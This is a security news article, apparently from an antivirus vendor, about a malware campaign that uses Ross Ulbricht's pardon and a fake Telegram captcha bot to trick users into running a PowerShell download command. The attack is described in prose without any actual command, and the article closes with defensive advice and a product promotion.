Criminals Exploit Telegram Captcha to Trick Victims into Installing Malware

Threat actors piggyback on Ross Ulbricht’s pardoning to spread malware via rogue Telegram captchas in a new malicious campaign spotted on X.

New malicious campaign targets X and Telegram users

Threat actors have been spotted using a deceitful tactic to trick users into joining rogue Telegram channels and unwittingly infect themselves with malware.

Vx-underground, who spotted the attack, says perpetrators are now spamming Ross Ulbricht’s official X account with messages from accounts either impersonating or claiming to be associated with him.

Ross Ulbricht’s pardoning weaponized

News of Ross William Ulbricht has recently made the headlines; the creator of the infamous Silk Road Darknet marketplace was pardoned yesterday.

The fake messages attempt to direct visitors to a purported official Ross Ulbricht Telegram channel, where an identity check through a so-called “Safeguard Captcha” bot is imposed.

Deceit through fake Telegram captchas

However, to proceed with the identity verification, users are asked to open Windows Run, paste a command, and execute it.

Although the bot’s instructions could seem benign, they actually harbor a PowerShell command that establishes a link to a spiked URL and downloads a malicious PowerShell script.

The script then downloads an additional batch of malicious files that propagate the malware on the host system.

Cobalt Strike potentially used in this campaign

Although the true nature of the downloaded files is unknown, some users speculate they could cloak a Cobalt Strike loader.

Cobalt Strike is a hacker-favored penetration testing tool that grants attackers remote capabilities on infected devices. This opens the door to further malicious activities, such as ransomware and data exfiltration.

Mitigating Telegram scams and other cyber threats

Considering that threat actors constructed the fake verification system’s phrasing carefully to avoid raising suspicion, it is safe to assume that the scam could have slipped unnoticed.

Vigilance might not be enough in such cases. Users should avoid running commands found online in their Windows Run, PowerShell, or CMD, especially when they’re uncertain about the commands’ effects on the host machine.

Specialized software like Bitdefender Ultimate Security can boost your defenses by detecting and blocking suspicious activity before it does harm.

It safeguards your devices against viruses, worms, spyware, Trojans, ransomware, rootkits, zero-day exploits, and other intrusions.

Its key features include continuous, comprehensive protection against all known threats, behavioral detection for active apps, network threat prevention, AI-powered scam detection, web attack prevention, and anti-fraud technology to keep you safe.